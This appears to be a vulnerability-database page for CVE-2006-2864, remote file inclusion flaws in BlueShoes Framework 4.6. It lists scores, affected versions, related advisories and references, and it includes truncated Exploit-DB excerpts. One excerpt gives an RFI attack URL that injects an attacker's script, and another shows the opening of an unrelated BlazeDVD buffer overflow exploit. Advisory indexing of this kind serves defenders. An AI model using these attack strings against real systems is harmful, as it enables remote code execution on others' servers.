CVE-2006-2864
published 2006-06-06CVE-2006-2864: Multiple PHP remote file inclusion vulnerabilities in BlueShoes Framework 4.6 allow remote attackers to execute arbitrary PHP code via a URL in the (1)…
PriorityP336medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
15.32%
96.4th percentile
Multiple PHP remote file inclusion vulnerabilities in BlueShoes Framework 4.6 allow remote attackers to execute arbitrary PHP code via a URL in the (1) APP[path][applications] parameter to (a) Bs_Faq.class.php, (2) APP[path][core] parameter to (b) fileBrowserInner.php, (c) file.php, and (d) viewer.php, and (e) Bs_ImageArchive.class.php, (3) GLOBALS[APP][path][core] parameter to (f) Bs_Ml_User.class.php, or (4) APP[path][plugins] parameter to (g) Bs_Wse_Profile.class.php.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| blueshoes | blueshoes_framework | <= 4.6 | — |
| blueshoes | blueshoes_framework | <= 4.6_public | — |
| blueshoes | blueshoes_framework | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-h92c-pq54-fg46: PHP remote file inclusion vulnerability in lib/googlesearch/GoogleSearch
ghsa_unreviewed·2022-05-01·CVSS 5.1
CVE-2006-5250 [MEDIUM] GHSA-h92c-pq54-fg46: PHP remote file inclusion vulnerability in lib/googlesearch/GoogleSearch
PHP remote file inclusion vulnerability in lib/googlesearch/GoogleSearch.php in BlueShoes 4.6_public and earlier allows remote attackers to execute arbitrary PHP code via a URL in the APP[path][lib] parameter, a different vector than CVE-2006-2864.
GHSA
GHSA-mx2f-qv6j-3c6h: Multiple PHP remote file inclusion vulnerabilities in BlueShoes Framework 4
ghsa_unreviewed·2022-05-01
CVE-2006-2864 [MEDIUM] GHSA-mx2f-qv6j-3c6h: Multiple PHP remote file inclusion vulnerabilities in BlueShoes Framework 4
Multiple PHP remote file inclusion vulnerabilities in BlueShoes Framework 4.6 allow remote attackers to execute arbitrary PHP code via a URL in the (1) APP[path][applications] parameter to (a) Bs_Faq.class.php, (2) APP[path][core] parameter to (b) fileBrowserInner.php, (c) file.php, and (d) viewer.php, and (e) Bs_ImageArchive.class.php, (3) GLOBALS[APP][path][core] parameter to (f) Bs_Ml_User.class.php, or (4) APP[path][plugins] parameter to (g) Bs_Wse_Profile.class.php.
No detection rules found.
Exploit-DB
BlazeDVD 6.2 - '.plf' Local Buffer Overflow (SEH)
exploitdb·2013-10-28
CVE-2006-6199 BlazeDVD 6.2 - '.plf' Local Buffer Overflow (SEH)
BlazeDVD 6.2 - '.plf' Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
#########################################################################################
# Exploit Title: BlazeDVD 6.2 .plf Buffer Overflow (SEH)
# Date: 10-28-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: BlazeDVD 6.2
# Software Link:
# Version: 6.2.0.0
# Tested On: Windows XP SP3
# To exploit, simply open blazesploit.plf file
#########################################################################################
my $buffsize = 10000; # sets buffer size for consistent sized payload
my $junk = "\x41" x 868; # nseh is at offset 868, followed by 2864 bytes of available data
my $nseh = "\xeb\x08\x90\x90"; # overwrite next seh with jmp instruction (8 bytes)
my $seh = pack('V',0x
Exploit-DB
BlueShoes Framework 4.6 - Remote File Inclusion
exploitdb·2006-06-03
CVE-2006-2864 BlueShoes Framework 4.6 - Remote File Inclusion
BlueShoes Framework 4.6 - Remote File Inclusion
---
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$ BlueShoes Framework 4.6 <= Remote File Include Vulnerability
$$ Script site: http://www.blueshoes.org/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: [email protected] or http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$ Adam, DeathSpeed, Drzewko, pepi
$$
$$ Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:
http://www.site.com/[BlueShoes_path]/applications/faq/Bs_Faq.class.php?APP[path][applications]=[evil_scripts]
http://www.site.com/[Blu
No writeups or analysis indexed.
http://secunia.com/advisories/20438http://www.blueshoes.org/en/news/http://www.osvdb.org/25996http://www.osvdb.org/25997http://www.osvdb.org/25998http://www.osvdb.org/25999http://www.osvdb.org/26000http://www.osvdb.org/26001http://www.osvdb.org/26002http://www.securityfocus.com/bid/18261http://www.vupen.com/english/advisories/2006/2128https://exchange.xforce.ibmcloud.com/vulnerabilities/26908https://www.exploit-db.com/exploits/1870http://secunia.com/advisories/20438http://www.blueshoes.org/en/news/http://www.osvdb.org/25996http://www.osvdb.org/25997http://www.osvdb.org/25998http://www.osvdb.org/25999http://www.osvdb.org/26000http://www.osvdb.org/26001http://www.osvdb.org/26002http://www.securityfocus.com/bid/18261http://www.vupen.com/english/advisories/2006/2128https://exchange.xforce.ibmcloud.com/vulnerabilities/26908https://www.exploit-db.com/exploits/1870
2006-06-06
Published